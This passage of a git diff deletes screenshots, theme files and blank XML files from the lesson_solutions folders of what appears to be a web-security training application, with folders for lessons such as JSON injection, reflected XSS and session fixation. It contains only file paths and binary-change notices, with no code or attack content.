Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg
deleted file mode 100644
index cd100cf63..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg
deleted file mode 100644
index 9a48ce5a4..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png b/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png
deleted file mode 100644
index 135fc3606..000000000
Binary files a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml
deleted file mode 100644
index 3f7752feb..000000000
--- a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png
deleted file mode 100644
index cfdb7b042..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png
deleted file mode 100644
index 217f69bd7..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png
deleted file mode 100644
index affeaa193..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png
deleted file mode 100644
index 709f70b6a..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png
deleted file mode 100644
index b7d120e45..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png
deleted file mode 100644
index 3d93d05e5..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg
deleted file mode 100644
index 21504eb14..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg
deleted file mode 100644
index cf6cc7471..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg
deleted file mode 100644
index ccd96c071..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg
deleted file mode 100644
index 3710a91c1..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg
deleted file mode 100644
index fecffb54d..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg
deleted file mode 100644
index f4edbeeb7..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml
deleted file mode 100644
index aa9eb0b16..000000000
--- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png
deleted file mode 100644
index bb24a6c8f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg
deleted file mode 100644
index ac600b733..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png
deleted file mode 100644
index 20f3f3871..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg
deleted file mode 100644
index 0ffa3bfe7..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png
deleted file mode 100644
index a189bb3d8..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg
deleted file mode 100644
index 2e361f07f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png
deleted file mode 100644
index 2e74b5ec7..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg
deleted file mode 100644
index 34cf88ebb..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif
deleted file mode 100644
index 1779f251e..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png
deleted file mode 100644
index 88661381a..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg
deleted file mode 100644
index ab68d0731..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png
deleted file mode 100644
index 4d3ab3e2f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg
deleted file mode 100644
index 3ba19dd7e..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png
deleted file mode 100644
index 90ea086b2..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg
deleted file mode 100644
index 47033c76c..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png
deleted file mode 100644
index 36393c423..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg
deleted file mode 100644
index 02087fd18..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png
deleted file mode 100644
index 6fa005b7c..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg
deleted file mode 100644
index fa77e0a36..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png
deleted file mode 100644
index 43737e5d1..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg
deleted file mode 100644
index 9cde03d4b..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png
deleted file mode 100644
index 24ef81f2b..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg
deleted file mode 100644
index 8fbe215fd..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db b/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db
deleted file mode 100644
index c8864bbfb..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml
deleted file mode 100644
index 66f2f27d6..000000000
--- a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png
deleted file mode 100644
index 59ffaca93..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png
deleted file mode 100644
index 100684c5f..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png
deleted file mode 100644
index 0174b03b0..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg
deleted file mode 100644
index 50abf182f..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg
deleted file mode 100644
index afd0c3eb3..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg
deleted file mode 100644
index 259e28f16..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx b/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg
deleted file mode 100644
index 4c69a2352..000000000
Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg
deleted file mode 100644
index 8a2189e3e..000000000
Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png
deleted file mode 100644
index 2cf17feb8..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png
deleted file mode 100644
index 3179d178e..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png
deleted file mode 100644
index 896334751..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png
deleted file mode 100644
index 75acaa951..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png
deleted file mode 100644
index 86bad431a..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg
deleted file mode 100644
index ea9895612..000000000
Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg
deleted file mode 100644
index ee40403cf..000000000
Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml
deleted file mode 100644
index 496ea3696..000000000
--- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png
deleted file mode 100644
index 089968f01..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg
deleted file mode 100644
index 4d4b17604..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png
deleted file mode 100644
index 0bc317162..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg
deleted file mode 100644
index 7978fe44b..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png
deleted file mode 100644
index 4f0de1d74..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg
deleted file mode 100644
index 4d4491eb3..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg b/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg
deleted file mode 100644
index 967ebaa4c..000000000
Binary files a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml
deleted file mode 100644
index 8ebcbe37d..000000000
--- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png
deleted file mode 100644
index 6ff72a45b..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png
deleted file mode 100644
index e44f2e566..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg
deleted file mode 100644
index 73cdb0bbf..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg
deleted file mode 100644
index fb2e1977e..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
deleted file mode 100644
index abc27092d..000000000
--- a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png
deleted file mode 100644
index eb4392c2d..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg
deleted file mode 100644
index 6301ccbb1..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png
deleted file mode 100644
index b6bf2f272..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg
deleted file mode 100644
index d94ac96c1..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png
deleted file mode 100644
index 4a274e847..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg
deleted file mode 100644
index b93cbad84..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png
deleted file mode 100644
index feb782736..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png
deleted file mode 100644
index 002ceece2..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage2.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png
deleted file mode 100644
index d7c056258..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage3.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png
deleted file mode 100644
index a905298d0..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png
deleted file mode 100644
index c0579ce8f..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_stage4_2.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png b/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png
deleted file mode 100644
index a3edf2e13..000000000
Binary files a/src/main/webapp/lesson_solutions/SessionFixation_files/sf_success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/SilentTransactions_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml b/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml
deleted file mode 100644
index dbcf5ad0e..000000000
--- a/src/main/webapp/lesson_solutions/SilentTransactions_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png b/src/main/webapp/lesson_solutions/SilentTransactions_files/image001.png
deleted file mode 100644
